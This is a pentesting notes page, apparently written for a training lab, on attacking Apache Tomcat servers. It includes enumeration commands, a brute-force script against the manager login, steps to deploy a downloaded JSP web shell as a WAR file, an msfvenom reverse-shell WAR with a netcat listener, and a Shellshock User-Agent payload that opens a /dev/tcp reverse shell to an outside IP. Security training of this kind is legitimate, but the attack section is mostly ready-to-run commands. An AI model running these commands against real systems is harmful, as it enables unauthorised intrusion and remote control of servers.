Apache Tomcat

Documentación

https://tomcat.apache.org/

Discovery/Footprinting

Tomcat servers can be identified by the Server header in the HTTP response. If the server is operating behind a reverse proxy, requesting an invalid page should reveal the server and version.

curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat

Folder structure

├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
|   |       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost

Enumeration

gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

/cgi
/CGI-bin

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

Ataques

https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login/

https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce

python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

http://web01.inlanefreight.local:8180/backup/cmd.jsp

curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
nc -lnvp 4443

multi/http/tomcat_mgr_upload

https://github.com/SecurityRiskAdvisors/cmd.jsp

gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
curl -i http://10.129.41.149/cgi-bin/access.cgi
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi
sudo nc -lvnp 7777

Hardening

https://tomcat.apache.org/tomcat-9.0-doc/security-howto.html

PreviousWebservers NextJenkins

Last updated 4 months ago

hashtagDocumentación

hashtagDiscovery/Footprinting

hashtagFolder structure

hashtagEnumeration

hashtagAtaques

hashtagHardening